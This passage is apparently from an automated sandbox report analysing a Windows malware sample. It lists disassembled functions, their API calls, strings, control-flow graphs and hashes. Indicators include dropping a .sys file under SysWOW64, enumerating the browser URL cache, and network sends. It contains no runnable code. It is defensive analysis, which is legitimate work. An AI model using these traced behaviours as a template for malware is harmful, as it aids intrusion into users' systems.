                                                                                                                                      • Opcode ID: 944a0bbf3361911eb7ad8aa6e37a69e8c13298601c88f074b32408413bd35bae
                                                                                                                                      • Instruction ID: 0efafed157f6999b1771c7508d961d0564d41e7a694675553f4cb26d7672e0b7
                                                                                                                                      • Opcode Fuzzy Hash: 944a0bbf3361911eb7ad8aa6e37a69e8c13298601c88f074b32408413bd35bae
                                                                                                                                      • Instruction Fuzzy Hash: 0A41F57A6043507BD710D7A08D85FBFB3A4ABD9394FB08C1DF59856244D674E409CB93
                                                                                                                                      Function 69EB0829 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 158libraryloaderCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 69EB0833
                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,69EB0AFA,?,?), ref: 69EB0863
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 69EB0877
                                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 69EB08B3
                                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 69EB08C1
                                                                                                                                      • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 69EB08DE
                                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 69EB0909
                                                                                                                                      • ConvertDefaultLocale.KERNEL32(000003FF), ref: 69EB0912
                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 69EB092B
                                                                                                                                      • EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,Function_00030093,?), ref: 69EB0948
                                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 69EB097B
                                                                                                                                      • ConvertDefaultLocale.KERNEL32(00000000), ref: 69EB0984
                                                                                                                                      • GetModuleFileNameA.KERNEL32(69E80000,?,00000105), ref: 69EB09C7
                                                                                                                                      • _memset.LIBCMT ref: 69EB09E7
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
                                                                                                                                      • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                                                      • API String ID: 3537336938-2299501126
                                                                                                                                      • Opcode ID: 3f73e476c1d1c94c2347041e374b34e8350afb1656ef6c277648a2e8717c525d
                                                                                                                                      • Instruction ID: f83342b3c5ee5ed88d8707aa2b27b5623e00690fd5edc4f225803133869f12a5
                                                                                                                                      • Opcode Fuzzy Hash: 3f73e476c1d1c94c2347041e374b34e8350afb1656ef6c277648a2e8717c525d
                                                                                                                                      • Instruction Fuzzy Hash: 78517B74C402288FCB65DF65CE447EEBAB4AB49315F1042EAE54CE7284DB749B85CFA0
                                                                                                                                      Function 00456B10 Relevance: 27.3, APIs: 18, Instructions: 335COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _sprintf$_strlen$_memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 689995866-0
                                                                                                                                      • Opcode ID: 2f48ccf8743bd2c78c1aeec8e517fe1fcd7c0ccc4cb3b7023c2ecaf6c0023346
                                                                                                                                      • Instruction ID: fc7b3f487477f5a82b5f18ab48ec057d25590878716a377b8357999cfdd00c31
                                                                                                                                      • Opcode Fuzzy Hash: 2f48ccf8743bd2c78c1aeec8e517fe1fcd7c0ccc4cb3b7023c2ecaf6c0023346
                                                                                                                                      • Instruction Fuzzy Hash: BDD172F1E402186EDB14EB55DC52FFE7674AB84708F4400EEF709661C1DAB86A488F5E
                                                                                                                                      Function 69E88E50 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 164networkfileCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$__strlwr$CleanupCloseCreateFileHandleStartup_sprintfgethostname
                                                                                                                                      • String ID: \\.\%s
                                                                                                                                      • API String ID: 2340954306-869905501
                                                                                                                                      • Opcode ID: 44623a9a5b5a8758e7c65bed4750d6a4dc82506c8e5be25be0633603607b4047
                                                                                                                                      • Instruction ID: 00d88e9ff1412899705d6c225c55f2fe3a152bb02705ccedbbf0fbf734573a44
                                                                                                                                      • Opcode Fuzzy Hash: 44623a9a5b5a8758e7c65bed4750d6a4dc82506c8e5be25be0633603607b4047
                                                                                                                                      • Instruction Fuzzy Hash: 1B5124B6508384AFD330D764AD95EEB73DDAB86308F108A1DE9ED86181EB70520C8793
                                                                                                                                      Function 00447A40 Relevance: 25.3, APIs: 13, Strings: 1, Instructions: 820COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$_strlen$_rand
                                                                                                                                      • String ID: P
                                                                                                                                      • API String ID: 1639540046-3110715001
                                                                                                                                      • Opcode ID: c255619834373ca500ecbe2e4fe5ea59501024cdb45a011c96eb5edaa5300448
                                                                                                                                      • Instruction ID: 640336ae6da7898648f2319418fbbccdc25e4a5e95f518cf26cba401aac1b041
                                                                                                                                      • Opcode Fuzzy Hash: c255619834373ca500ecbe2e4fe5ea59501024cdb45a011c96eb5edaa5300448
                                                                                                                                      • Instruction Fuzzy Hash: AE8249B0D012189BEF24DF55CC81BEEB7B1AB94308F1041DEE50966282DB795EC5CF9A
                                                                                                                                      Function 0044BA30 Relevance: 23.3, APIs: 11, Strings: 2, Instructions: 519COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 878 44ba30-44bac0 call 498fa0 call 421c60 _memset * 2 883 44bac7-44bace 878->883 884 44bad4 883->884 885 44bcb5-44bcd8 _strncmp 883->885 886 44bade-44bae8 884->886 887 44bcf7-44bd60 _swscanf 885->887 888 44bcda-44bcf2 call 422080 885->888 891 44baf9-44bb05 886->891 889 44bd62-44bd7a call 422080 887->889 890 44bd7f-44bd89 887->890 906 44c3bd-44c3ca call 494e64 888->906 889->906 894 44bd97-44bdaf call 422080 890->894 895 44bd8b-44bd95 890->895 896 44bb07-44bb1d 891->896 897 44bb23-44bb2f 891->897 894->906 895->894 900 44bdb4-44bdbe 895->900 902 44bb21 896->902 903 44bb1f 896->903 904 44bb31-44bb38 897->904 905 44bb5f-44bb61 897->905 910 44bdc4-44bdf5 call 421cc0 call 4224a0 900->910 911 44bf26-44bf41 call 4966a0 900->911 902->891 903->897 904->905 912 44bb3a-44bb59 904->912 905->886 913 44bb67-44bb99 select 905->913 943 44bf1b-44bf21 call 422080 910->943 944 44bdfb-44be6a call 42a4a0 call 4224a0 910->944 926 44bf60-44bf83 _swscanf 911->926 927 44bf43-44bf5b call 422080 911->927 912->905 917 44bbb8-44bbbf 913->917 918 44bb9b 913->918 919 44bbc1-44bbce 917->919 920 44bbf2-44bc17 917->920 923 44bb9e-44bbb3 call 422080 918->923 924 44bbd0-44bbe8 call 422080 919->924 925 44bbed 919->925 920->923 939 44bc19-44bc1d 920->939 923->906 924->906 925->883 934 44bf85-44bf9d call 422080 926->934 935 44bfa2-44bfb8 926->935 927->906 934->906 941 44bfd8-44bff0 935->941 942 44bfba-44bfc4 935->942 939->885 945 44c000-44c018 call 422080 941->945 946 44bff2-44bffe 941->946 942->941 949 44bfc6-44bfd5 942->949 943->911 961 44be6c-44be72 944->961 962 44be78-44be7f 944->962 945->906 946->945 952 44c01d-44c027 946->952 949->941 956 44c054-44c07f call 46deae 952->956 957 44c029-44c04d call 46dea3 952->957 967 44c0a7 956->967 968 44c081-44c0a5 _memset 956->968 957->956 961->962 965 44be85-44bf0b call 42a380 _memset call 42a410 call 422520 call 495e90 call 422080 962->965 966 44bf10-44bf16 call 422080 962->966 965->966 966->943 971 44c0b1-44c0ca 967->971 968->971 973 44c0cc-44c0e7 _memset 971->973 974 44c0ea-44c0f1 971->974 973->974 975 44c0f8-44c0ff 974->975 977 44c344-44c34e 975->977 978 44c105-44c122 _memset 975->978 981 44c350-44c375 call 4966a0 977->981 982 44c398-44c3b0 call 422080 977->982 980 44c12c-44c136 978->980 984 44c147-44c153 980->984 981->982 995 44c377-44c394 call 422080 981->995 982->906 988 44c155-44c16b 984->988 989 44c171-44c17d 984->989 993 44c16d 988->993 994 44c16f 988->994 996 44c1ad-44c1af 989->996 997 44c17f-44c186 989->997 993->989 994->984 995->906 996->980 1002 44c1b5-44c1e7 select 996->1002 997->996 1001 44c188-44c1a7 997->1001 1001->996 1005 44c1ee-44c1f5 1002->1005 1006 44c1e9 1002->1006 1007 44c1f7-44c204 1005->1007 1008 44c210-44c23b 1005->1008 1006->977 1009 44c206 1007->1009 1010 44c20b 1007->1010 1012 44c242-44c249 1008->1012 1013 44c23d 1008->1013 1009->977 1010->975 1014 44c2a0-44c2aa 1012->1014 1015 44c24b-44c275 1012->1015 1013->977 1018 44c2d5-44c320 1014->1018 1019 44c2ac-44c2d2 call 495860 1014->1019 1016 44c294 1015->1016 1017 44c277-44c289 1015->1017 1023 44c29b 1016->1023 1017->1016 1022 44c28b-44c292 1017->1022 1020 44c322-44c334 1018->1020 1021 44c33f 1018->1021 1019->1018 1020->1021 1026 44c336-44c33d 1020->1026 1021->975 1022->1023 1023->977 1026->977
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$_strncmpselect
                                                                                                                                      • String ID: @$@
                                                                                                                                      • API String ID: 692437902-149943524
                                                                                                                                      • Opcode ID: 183215c8bb1f03ebbcd6813902149f004401268681d559346aab686bc43b193a
                                                                                                                                      • Instruction ID: a56f35db8cbba11d9c6543c9fd04e5a1cac4403ca3eacc9667de79df2434cf09
                                                                                                                                      • Opcode Fuzzy Hash: 183215c8bb1f03ebbcd6813902149f004401268681d559346aab686bc43b193a
                                                                                                                                      • Instruction Fuzzy Hash: E1423974A042288FEB24CF54CC91BEAB7B1BF46308F1481DAE40967251D779AF85CF56
                                                                                                                                      Function 0046CD20 Relevance: 22.7, APIs: 15, Instructions: 216networkCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _strlen$_memset$Send_strncat_strncpy
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2152255796-0
                                                                                                                                      • Opcode ID: 424f236ed3957b980ae3a82b48e326cee9507c95d6f93124d7a03dfda963c5a2
                                                                                                                                      • Instruction ID: d874df0cd05d05cc3d581ecd34ce142a77e57668cd57799c89de1cefc080d6cb
                                                                                                                                      • Opcode Fuzzy Hash: 424f236ed3957b980ae3a82b48e326cee9507c95d6f93124d7a03dfda963c5a2
                                                                                                                                      • Instruction Fuzzy Hash: E88174B6D00108ABDF10DF65EC85FDD7BB9AB58308F1481ADE908A7241E735AB48CF95
                                                                                                                                      Function 00463860 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 159COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1058 463860-4638cb FindFirstUrlCacheEntryA call 46deae 1061 4638ce-4638de FindFirstUrlCacheEntryA 1058->1061 1062 4638e0 1061->1062 1063 463959-463987 1061->1063 1064 4638e7-4638f4 1062->1064 1070 4639a8-4639dc 1063->1070 1071 463989-463992 1063->1071 1066 4638f6 1064->1066 1067 4638f8-463927 1064->1067 1066->1063 1067->1061 1076 463929-463957 call 46deae 1067->1076 1081 463a3e-463a68 1070->1081 1082 4639de-463a18 1070->1082 1073 463997-4639a3 1071->1073 1073->1070 1076->1063 1076->1064
                                                                                                                                      APIs
                                                                                                                                      • FindFirstUrlCacheEntryA.WININET(00000000,00000000,00000000,00000000,00520510), ref: 004638AA
                                                                                                                                      • FindFirstUrlCacheEntryA.WININET(?,00000000,00000000,00000000), ref: 004638D2
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CacheEntryFindFirst
                                                                                                                                      • String ID: C$L$R$U$f$g$i$n$o
                                                                                                                                      • API String ID: 576193867-938646213
                                                                                                                                      • Opcode ID: 86bb56c9cb0e86601f544ca7f00fd5b7a6d78775654eef551b476b3c7938fcc6
                                                                                                                                      • Instruction ID: 6eea6ee027777094caba2e7dd33475cad9c026376a385d8c1be184088d4fcf32
                                                                                                                                      • Opcode Fuzzy Hash: 86bb56c9cb0e86601f544ca7f00fd5b7a6d78775654eef551b476b3c7938fcc6
                                                                                                                                      • Instruction Fuzzy Hash: 4551D5B1D04289EFDB00DFA8C841BEEBBB4EF59704F10415AE511B7281E37A9A05CB66
                                                                                                                                      Function 69E87780 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 125sleepfileCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$DeleteDirectoryErrorFileLastSleepWindows_strncpywsprintf
                                                                                                                                      • String ID: %s\SysWOW64\%s.sys
                                                                                                                                      • API String ID: 3743109446-2095779045
                                                                                                                                      • Opcode ID: f7215545c061ff13034f9fa2d4e064db399d1328327c9bc49169bbc01aaa2dd7
                                                                                                                                      • Instruction ID: 4062b5829ebdfc53e535ea1808f60215b715bda9c7755b7af30517cd906019c0
                                                                                                                                      • Opcode Fuzzy Hash: f7215545c061ff13034f9fa2d4e064db399d1328327c9bc49169bbc01aaa2dd7
                                                                                                                                      • Instruction Fuzzy Hash: 0A41A7B56183819FD720DBA4CA40F9FB7EDAFC5308F50491DA69D83152E7359608C7A3
                                                                                                                                      Function 69E91240 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 288sleepCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1218 69e91240-69e9125d call 69ebed6c 1221 69e91269-69e912b1 call 69ec3c70 call 69ebfba5 call 69ec07f1 call 69ec0803 CreateEventA 1218->1221 1222 69e9125f-69e91268 1218->1222 1221->1222 1231 69e912b3-69e912c2 CreateEventA 1221->1231 1231->1222 1232 69e912c4-69e912c9 1231->1232 1233 69e912cc-69e9130a call 69ebef37 1232->1233 1236 69e9130c-69e91310 1233->1236 1237 69e91312-69e91321 Sleep 1233->1237 1236->1237 1238 69e91323-69e9137e WaitForMultipleObjects 1236->1238 1237->1233 1237->1238 1239 69e91381-69e91385 1238->1239 1240 69e913ad-69e913b4 1239->1240 1241 69e91387-69e91389 1239->1241 1240->1239 1244 69e913b6-69e913ba 1240->1244 1242 69e9138b-69e913a8 1241->1242 1243 69e913bc-69e913f3 1241->1243 1242->1240 1245 69e913f8-69e913fa 1243->1245 1244->1245 1246 69e9152a-69e9152c 1245->1246 1247 69e91400-69e91402 1245->1247 1248 69e9156f-69e9157b call 69ebed6c 1246->1248 1249 69e9152e-69e91560 1246->1249 1250 69e91408-69e9146e call 69e8f290 * 2 1247->1250 1251 69e914fe-69e91528 1247->1251 1259 69e9157d-69e9158e call 69ebef37 1248->1259 1260 69e91596-69e915a1 1248->1260 1252 69e91564-69e91568 1249->1252 1250->1248 1263 69e91474 1250->1263 1251->1252 1255 69e9156a 1252->1255 1255->1248 1264 69e91593 1259->1264 1265 69e91481-69e91483 1263->1265 1266 69e91476-69e9147b 1263->1266 1264->1260 1267 69e914c0-69e914fc 1265->1267 1268 69e91485 1265->1268 1266->1248 1266->1265 1267->1255 1269 69e9148b-69e914bb 1268->1269 1270 69e91487-69e91489 1268->1270 1269->1255 1270->1267 1270->1269
                                                                                                                                      APIs
                                                                                                                                      • _malloc.LIBCMT ref: 69E91251
                                                                                                                                        • Part of subcall function 69EBED6C: __FF_MSGBANNER.LIBCMT ref: 69EBED8F
                                                                                                                                        • Part of subcall function 69EBED6C: __NMSG_WRITE.LIBCMT ref: 69EBED96
                                                                                                                                        • Part of subcall function 69EBED6C: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,69EC8DFF,?,00000001,?,?,69EC7CE7,00000018,69EE8F08,0000000C,69EC7D78), ref: 69EBEDE3
                                                                                                                                      • _memset.LIBCMT ref: 69E91271
                                                                                                                                      • __time64.LIBCMT ref: 69E9127B
                                                                                                                                      • _rand.LIBCMT ref: 69E9128C
                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 69E912AB
                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 69E912BB
                                                                                                                                      • Sleep.KERNEL32(00000032,?,?,?,?,?,?,?,?,?), ref: 69E91314
                                                                                                                                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000001,00002710,?,?,?,?,?,?,?,?,?), ref: 69E91348
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateEvent$AllocateHeapMultipleObjectsSleepWait__time64_malloc_memset_rand
                                                                                                                                      • String ID: v
                                                                                                                                      • API String ID: 2331941488-1801730948
                                                                                                                                      • Opcode ID: 2b6d3efe158948cf9f103015d4fc2dd123884e0c896c6b4dc3e00efbdb589454
                                                                                                                                      • Instruction ID: 0d0b766c5bfbd2f6bc2b6f782c260a193e4a03c3c3dc8ab74bac5fcf29fa67b4
                                                                                                                                      • Opcode Fuzzy Hash: 2b6d3efe158948cf9f103015d4fc2dd123884e0c896c6b4dc3e00efbdb589454
                                                                                                                                      • Instruction Fuzzy Hash: 8DC1E4B86083019FD308CF59C580A5ABBF5FF89754F20896DF899873A0D771E945CB92
                                                                                                                                      Function 69EB5988 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 122COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
